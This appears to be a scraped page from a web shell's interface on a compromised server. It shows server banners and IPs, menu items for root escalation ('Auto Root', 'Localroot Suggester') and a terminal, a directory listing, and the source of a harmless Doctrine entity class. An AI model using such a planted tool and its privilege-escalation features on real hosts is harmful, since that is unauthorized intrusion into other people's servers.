Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.218.135.221
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
src /
Entity /
Delete
Unzip
Name
Size
Permission
Date
Action
.gitignore
0
B
-rw-rw-r--
2022-08-25 15:00
Catalog.php
6.21
KB
-rw-rw-r--
2023-08-11 07:51
CatalogLog.php
6.12
KB
-rw-rw-r--
2023-08-11 07:51
CatalogUpdates.php
1.31
KB
-rw-rw-r--
2023-03-15 13:04
Incomes.php
6.55
KB
-rw-rw-r--
2023-04-27 08:04
Orders.php
9.43
KB
-rw-rw-r--
2023-07-23 16:00
OrdersLog.php
9.77
KB
-rw-rw-r--
2023-07-23 16:00
Reports.php
24.52
KB
-rw-rw-r--
2023-07-23 16:34
Sales.php
12.44
KB
-rw-rw-r--
2023-04-27 08:04
SalesLog.php
12.79
KB
-rw-rw-r--
2023-06-10 20:27
Stocks.php
8.73
KB
-rw-rw-r--
2023-05-24 07:20
StocksLog.php
9.08
KB
-rw-rw-r--
2023-07-03 06:46
User.php
11.22
KB
-rw-rw-r--
2023-08-29 09:18
Warehouses.php
2.45
KB
-rw-rw-r--
2023-04-27 08:04
Save
Rename
<?php namespace App\Entity; use Doctrine\Common\Collections\ArrayCollection; use Doctrine\Common\Collections\Collection; use Doctrine\ORM\Mapping as ORM; /** * Kes * @ORM\Entity * @ORM\Table(name="warehouses") */ class Warehouses { /** * @ORM\Id * @ORM\GeneratedValue * @ORM\Column(type="integer") */ private $id; /** * @var integer * @ORM\Column(type="integer", nullable="true") */ private $accountId; /** * @var integer * @ORM\Column(type="int", nullable="true") */ private $wbId; /** * @var string * @ORM\Column(type="string", length=255, nullable="true") */ private $name; /** * @var \DateTime * @ORM\Column(type="datetime") */ private $createdAt; /** * @var \DateTime * @ORM\Column(type="datetime") */ private $updatedAt; public function __construct() { } /** * Get id. * * @return int */ public function getId() { return $this->id; } /** * @return integer */ public function getAccountId() { return $this->accountId; } /** * @param integer $accountId */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return int */ public function getName() { return $this->name; } /** * @param string $name */ public function setName($name) { $this->name = $name; } /** * @return int */ public function getWbId() { return $this->wbId; } /** * @param int $wbId */ public function setWbId($wbId) { $this->wbId = $wbId; } /** * Set createdAt * * @param \DateTime $createdAt * */ public function setCreatedAt($createdAt) { $this->createdAt = $createdAt; return $this; } /** * Get createdAt * * @return \DateTime */ public function getCreatedAt() { return $this->createdAt; } /** * Set updatedAt * * @param \DateTime $updatedAt * * @return Kes */ public function setUpdatedAt($updatedAt) { $this->updatedAt = $updatedAt; return $this; } /** * Get updatedAt * * @return \DateTime */ public function getUpdatedAt() { return $this->updatedAt; } }